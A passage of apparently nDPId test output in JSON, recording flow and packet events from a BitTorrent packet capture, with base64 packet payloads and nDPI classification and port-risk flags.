(cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1455469977285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":153,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":153,"pkt_l4_len":119,"thread_ts_msec":1455469977285,"pkt":"xCwDBkn+LFbcjDU0CABFAACLG6xAAHIGY0mXDzC9wKgBA7eZzrXYT8EmdBCQyIAYAQLHiQAAAQEICktcmNgZ3BbJE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogWCKk\/sCNEtOuUAAADnFABkMTplaTBlNDppcHY0"} 
-01336{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1455469977324,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":618,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":618,"pkt_l4_len":584,"thread_ts_msec":1455469977324,"pkt":"xCwDBkn+LFbcjDU0CABFAAJcG65AAHIGYXaXDzC9wKgBA7eZzrXYT8F9dBCQyIAZAQKR1gAAAQEICktcmOYZ3BbJNDqXDzC9MTI6Y29tcGxldGVfYWdvaTFlMTptZDExOnVwbG9hZF9vbmx5aTNlMTE6bHRfZG9udGhhdmVpN2UxMjp1dF9ob2xlcHVuY2hpNGUxMTp1dF9tZXRhZGF0YWkyZTY6dXRfcGV4aTFlMTA6dXRfY29tbWVudGk2ZWUxMzptZXRhZGF0YV9zaXplaTE5MDA5ZTE6cGk0NzAwMWU0OnJlcXFpMjU1ZTE6djE1Os68VG9ycmVudCAzLjQuNTI6eXBpNTI5MTdlNjp5b3VyaXA0OlI3zQFlAAAAdAX\/\/\/\/\/\/7\/\/\/\/\/\/\/f\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/u\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/37\/\/\/\/\/\/\/\/\/\/f\/\/3\/\/3\/\/\/7\/\/\/\/v\/\/f\/\/\/f\/\/\/3\/\/\/\/\/\/v\/\/f\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/3\/\/\/+AAAAABQQAAAMOAAAABQQAAAApAAAABQQAAAJ1AAAABQQAAAKiAAAABQQAAADVAAAABQQAAAH3AAAABQQAAANZAAAABQQAAADFAAAABQQAAAN2AAAABQQAAAD5AAAABQQAAAD9AAAABQQAAAL9AAAABQQAAAKRAAAABQQAAAK6AAAABQQAAAC9AAAABQQAAAFxAAAABQQAAAHwAAAABQQAAAJKAAAABQQAAAFDAAAABQQAAAJcAAAABQQAAABWAAAABQQAAALUAAAABQQAAAI2AAAABQQAAAB7"} 
-01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1455469977685,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469977685,"pkt":"xCwDBkn+LFbcjDU0CABFAAJ8WMNAAHMGaW2+Z8M4wKgBA7YpzrIzpu\/x0lL2fIAYAQLBOgAAAQEICgC\/e9sZ3BX+NDppcHY0NDq+Z8M4NDppcHY2MTY6IAEAAF71efs4aCApQZg8xzEyOmNvbXBsZXRlX2Fnb2kyZTE6bWQxMTp1cGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpNDY2MzNlNDpyZXFxaTI1NWUxOnYxNjpCaXRUb3JyZW50IDcuOS41Mjp5cGk1MjkxNGU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/X\/\/\/v\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/f+\/\/\/7\/\/\/\/v\/\/\/\/\/99\/\/+\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/\/\/\/+7\/\/3\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/77\/\/\/f\/\/\/3\/3f\/3\/\/\/\/\/\/\/v\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAApsAAAAFBAAAAk8AAAAFBAAAAtoAAAAFBAAAAWUAAAAFBAAAAxcAAAAFBAAAAVIAAAAFBAAAAsoAAAAFBAAAASUAAAAFBAAAADsAAAAFBAAAAOgAAAAFBAAAAg0AAAAFBAAAArAAAAAFBAAAApUAAAAFBAAAAtYAAAAFBAAAAIEAAAAFBAAAAQkAAAAFBAAAAugAAAAFBAAAAhEAAAAFBAAAAUwAAAAFBAAAAiIAAAAFBAAAAPMAAAAFBAAAAbAAAAAFBAAAACQAAAAFBAAAACI="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978413,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4DnNAAEAGAADAqAEDX+qfEM65oPXUDpz5ZKj0loAYkUPBEAAAAQEIChncG14CELSbE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvUWScco35PygrU="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978413,"flow_last_seen":1455469978413,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978413,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
-00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469978422,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4xBlAAEAGAADAqAEDX+3BIs66LDm\/gbIP+oH76IAYlsHjJQAAAQEIChncG2YAA5hpE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjvGP0W3l6zj59Ik="} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469978422,"flow_last_seen":1455469978422,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469978422,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00633{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1455469978654,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978654,"pkt":"xCwDBkn+LFbcjDU0CABFAACrIv1AAHYG\/pRf7cEiwKgBAyw5zrr6gfvov4GyU4AYAQLALAAAAQEICgADmIEZ3BtmE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wog5gTbVhOs8MSY8AAADnFABkMTplaTBlNDppcHY0NDpf7cEiMTI6Y29tcGxldGVfYWdvaTJlMTptZDExOnU="} -00632{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1455469978662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":185,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":185,"pkt_l4_len":151,"thread_ts_msec":1455469978662,"pkt":"xCwDBkn+LFbcjDU0CABFAACrdTRAAHcGzXJf6p8QwKgBA6D1zrlkqPSW1A6dPYAYAMM1JwAAAQEICgIQtLMZ3BteE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wos5cW3r846cWQCoAAADoFABkMTplaTBlNDppcHY0NDpf6p8QMTI6Y29tcGxldGVfYWdvaTQ1ZTE6bWQxMTo="} 
-01296{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1455469978678,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1455469978678,"pkt":"xCwDBkn+LFbcjDU0CABFAAI9dTZAAHcGy95f6p8QwKgBA6D1zrlkqPUN1A6dPYAZAMPqbAAAAQEICgIQtLMZ3BtedXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTQxMjA1ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyMWU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/7\/\/\/\/\/\/\/\/\/f\/\/\/\/9\/\/\/\/3\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/v7\/\/v\/\/\/\/\/7\/\/3\/f\/\/\/\/\/r\/\/\/v\/\/\/\/9\/\/\/\/\/\/\/\/\/+\/\/\/\/\/3\/7\/\/\/\/\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/9\/\/f\/4AAAAAFBAAAACUAAAAFBAAAAJwAAAAFBAAAArkAAAAFBAAAAfAAAAAFBAAAA3QAAAAFBAAAAosAAAAFBAAAAZ8AAAAFBAAAAdUAAAAFBAAAAqwAAAAFBAAAAhUAAAAFBAAAAM0AAAAFBAAAAk4AAAAFBAAAAIAAAAAFBAAAA4IAAAAFBAAAAF4AAAAFBAAAAi0AAAAFBAAAAVYAAAAFBAAAAZcAAAAFBAAAA1AAAAAFBAAAAeYAAAAFBAAAAa8AAAAFBAAAAhcAAAAFBAAAAw0AAAAFBAAAARs="} 
-01298{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1455469978679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":586,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":586,"pkt_l4_len":552,"thread_ts_msec":1455469978679,"pkt":"xCwDBkn+LFbcjDU0CABFAAI8IwBAAHYG\/QBf7cEiwKgBAyw5zrr6gfxfv4GyU4AZAQJxbQAAAQEICgADmIEZ3BtmcGxvYWRfb25seWkzZTExOmx0X2RvbnRoYXZlaTdlMTI6dXRfaG9sZXB1bmNoaTRlMTE6dXRfbWV0YWRhdGFpMmU2OnV0X3BleGkxZTEwOnV0X2NvbW1lbnRpNmVlMTM6bWV0YWRhdGFfc2l6ZWkxOTAwOWUxOnBpMTEzMjFlNDpyZXFxaTI1NWUxOnYxNTrOvFRvcnJlbnQgMy40LjUyOnlwaTUyOTIyZTY6eW91cmlwNDpSN80BZQAAAHQF\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/+\/\/7\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/\/\/v\/\/\/v\/\/v\/\/+P\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/+\/7\/7\/\/\/\/\/\/7\/\/\/\/\/\/v\/\/3+\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/7\/\/\/+\/\/\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/3\/\/gAAAAAUEAAACNQAAAAUEAAACYwAAAAUEAAADgAAAAAUEAAAB1wAAAAUEAAAAyQAAAAUEAAABzQAAAAUEAAACUQAAAAUEAAABYQAAAAUEAAACzQAAAAUEAAAApQAAAAUEAAACtgAAAAUEAAACSAAAAAUEAAACDQAAAAUEAAABIQAAAAUEAAABYwAAAAUEAAAC5wAAAAUEAAAAlQAAAAUEAAABYgAAAAUEAAABlQAAAAUEAAADQQAAAAUEAAAB4wAAAAUEAAABOQAAAAUEAAABSwAAAAUEAAAAfQ=="} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00566{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980213,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4U25AAEAGAADAqAEDU9i48c6\/yNUzq1kTBM6UFIAYL5vO3wAAAQEIChncIiN4G2eaE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1Bjq+Lj4Q+qUQM4PY="} -00727{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":113,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980213,"flow_last_seen":1455469980213,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980213,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00567{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980262,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4esFAAEAGAADAqAEDXUH5ZM6+emiQl\/fDL3XicoAYTYMYvAAAAQEIChncIlIAH\/RSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjkTA1ljAvA+q8j0="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980262,"flow_last_seen":1455469980262,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980262,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": {"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} 
-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469980275,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4g5FAAEAGAADAqAEDXUHjZM69Sqzdpe7S802+OYAYVXMCvAAAAQEIChncIl4AhA2FE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjlkhEgSgYOOKqPw="} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":115,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469980275,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"},"bittorrent": 
{"hash":"dcfcdccfb9e670ccc3dd40c78c161f2bea243126"}} -00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1455469980297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1455469980297,"pkt":"xCwDBkn+LFbcjDU0CABFYACEPABAADIGPZ9T2LjxwKgBA8jVzr8EzpQUM6tZV4AYECksHwAAAQEICngbZ84Z3CIjE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMTg4Qi2qnlHDgsE5LNSCYRoAAAEAFABkMTplaTA="} -01382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1455469980371,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":650,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":650,"pkt_l4_len":616,"thread_ts_msec":1455469980371,"pkt":"xCwDBkn+LFbcjDU0CABFYAJ8C7pAADIGa+1T2LjxwKgBA8jVzr8EzpRkM6tZV4AYECkszQAAAQEICngbaAwZ3CJzZTQ6aXB2NDQ6U9i48TQ6aXB2NjE2Ov6AAAAAAAAA6gaI\/\/7N9BMxMjpjb21wbGV0ZV9hZ29pMWUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTUxNDEzZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDEuOC44Mjp5cGk1MjkyN2U2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/v\/\/\/\/\/\/\/\/9\/f\/+\/\/9\/\/\/f\/\/\/\/\/\/\/73v\/\/\/\/\/\/\/\/\/\/f\/9\/\/\/\/\/\/\/\/\/\/\/\/\/9\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/3\/\/7\/\/3\/9v\/\/\/9+\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/+\/\/\/\/7\/\/\/\/\/\/\/\/+\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAiQAAAAFBAAAAQwAAAAFBAAAAisAAAAFBAAAArIAAAAFBAAAAFgAAAAFBAAAAxMAAAAFBAAAAgYAAAAFBAAAAfgAAAAFBAAAAvcAAAAFBAAAAm0AAAAFBAAAAMYAAAAFBAAAA0sAAAAFBAAAAXAAAAAFBAAAAMEAAAAFBAAAAecAAAAFBAAAABcAAAAFBAAAAI4AAAAFBAAAAHoAAAAFBAAAAgkAAAAFBAAAAMsAAAAFBAAAAGkAAAAFBAAAARw
AAAAFBAAAAdQAAAAFBAAAAFA="} -00629{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1455469980390,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1455469980390,"pkt":"xCwDBkn+LFbcjDU0CABFAACocqBAAHMGfF5dQflkwKgBA3pozr4vdeJykJf4B4AYAMOuCwAAAQEICgAf9F4Z3CJSE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVUMzQ1MC3wogL0Pl3FbMgdQMAAAAEAFABkMTplaTBlNDppcHY0NDpdQflkNDppcHY2MTY6IAEAAF71ef0Mhifaor4="} -01334{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1455469980488,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1455469980488,"pkt":"xCwDBkn+LFbcjDU0CABFAAJYcqJAAHMGeqxdQflkwKgBA3pozr4vdeLmkJf4B4AZAMO1LAAAAQEICgAf9F8Z3CJSBpsxMjpjb21wbGV0ZV9hZ29pMmUxOm1kMTE6dXBsb2FkX29ubHlpM2UxMTpsdF9kb250aGF2ZWk3ZTEyOnV0X2hvbGVwdW5jaGk0ZTExOnV0X21ldGFkYXRhaTJlNjp1dF9wZXhpMWUxMDp1dF9jb21tZW50aTZlZTEzOm1ldGFkYXRhX3NpemVpMTkwMDllMTpwaTMxMzM2ZTQ6cmVxcWkyNTVlMTp2MTU6zrxUb3JyZW50IDMuNC41Mjp5cGk1MjkyNmU2OnlvdXJpcDQ6UjfNAWUAAAB0Bf\/\/\/\/\/\/\/\/\/\/\/99\/\/\/\/\/\/9\/\/+\/\/\/\/\/\/\/\/7\/\/3\/\/\/\/\/\/\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/7\/\/\/\/\/\/\/\/\/\/\/\/+\/\/\/\/\/v\/\/\/\/\/9\/\/\/\/\/\/3\/\/\/\/\/\/\/\/\/\/\/36\/\/\/\/\/93\/\/\/\/\/\/\/\/\/\/\/\/\/fv\/\/\/9P\/\/3\/\/\/\/\/f\/\/\/\/\/\/\/\/\/\/\/\/4AAAAAFBAAAAm0AAAAFBAAAApQAAAAFBAAAAI0AAAAFBAAAA0AAAAAFBAAAASAAAAAFBAAAAwgAAAAFBAAAAHoAAAAFBAAAAV0AAAAFBAAAAfQAAAAFBAAAAwsAAAAFBAAAAmsAAAAFBAAAAhwAAAAFBAAAAuYAAAAFBAAAAmQAAAAFBAAAApAAAAAFBAAAAFAAAAAFBAAAAc0AAAAFBAAAAa0AAAAFBAAAAx4AAAAFBAAAANIAAAAFBAAAAu0AAAAFBAAAAwoAAAAFBAAAAEoAAAAFBAAAAME=
